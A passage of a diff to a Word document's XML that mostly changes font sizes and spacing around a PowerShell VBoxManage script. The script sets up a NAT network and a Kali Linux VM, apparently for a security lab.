-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Write-Output "Starting NAT network '$</w:t>
@@ -5550,8 +5561,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -5559,8 +5570,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>'."</w:t>
@@ -5568,17 +5579,18 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
@@ -5586,8 +5598,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -5595,8 +5607,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
@@ -5604,8 +5616,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> start --</w:t>
@@ -5613,8 +5625,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>netname</w:t>
@@ -5622,8 +5634,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $</w:t>
@@ -5631,8 +5643,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -5641,25 +5653,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Start-Sleep 10</w:t>
@@ -5667,25 +5681,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
@@ -5693,16 +5709,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># 2. Create Kali VM for attack | +- 2min</w:t>
@@ -5710,16 +5727,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
@@ -5727,25 +5745,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Register VM</w:t>
@@ -5753,17 +5773,18 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
@@ -5771,8 +5792,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -5780,8 +5801,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>createvm</w:t>
@@ -5789,8 +5810,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> --name $KALI_VM --</w:t>
@@ -5798,8 +5819,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ostype</w:t>
@@ -5807,8 +5828,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> 'Debian_64' --register</w:t>
@@ -5816,25 +5837,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Set VM settings</w:t>
@@ -5842,17 +5865,18 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
@@ -5860,8 +5884,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -5869,8 +5893,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>modifyvm</w:t>
@@ -5878,8 +5902,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $KALI_VM --</w:t>
@@ -5887,8 +5911,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>cpus</w:t>
@@ -5896,8 +5920,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
@@ -5905,8 +5929,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>graphicscontroller</w:t>
@@ -5914,8 +5938,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -5923,8 +5947,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>vmsvga</w:t>
@@ -5932,8 +5956,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> --</w:t>
@@ -5941,8 +5965,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>vram</w:t>
@@ -5950,8 +5974,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
@@ -5959,8 +5983,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
@@ -5968,8 +5992,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> --nat-network1 $</w:t>
@@ -5977,8 +6001,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -5986,8 +6010,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop bidirectional</w:t>
@@ -5995,25 +6019,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Add a SATA storage controller</w:t>
@@ -6021,17 +6047,18 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
@@ -6039,8 +6066,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -6048,8 +6075,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>storagectl</w:t>
@@ -6057,8 +6084,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $KALI_VM --name 'SATA' --add </w:t>
@@ -6066,8 +6093,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>sata</w:t>
@@ -6075,8 +6102,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> --controller </w:t>
@@ -6084,8 +6111,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>IntelAHCI</w:t>
@@ -6093,8 +6120,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> --bootable on</w:t>
@@ -6102,25 +6129,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Add existing VDI to SATA controller</w:t>
@@ -6128,17 +6157,18 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
@@ -6146,8 +6176,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -6155,8 +6185,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>storageattach</w:t>
@@ -6164,8 +6194,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $KALI_VM --</w:t>
@@ -6173,8 +6203,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>storagectl</w:t>
@@ -6182,8 +6212,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
@@ -6191,8 +6221,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>hdd</w:t>
@@ -6200,8 +6230,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> --medium </w:t>
@@ -6209,8 +6239,8 @@
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>'.\VDI\Kali</w:t>
@@ -6218,8 +6248,8 @@
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> Linux 2023.4 (64bit).</w:t>
@@ -6227,8 +6257,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>vdi</w:t>
@@ -6236,8 +6266,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>'</w:t>
@@ -6245,25 +6275,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
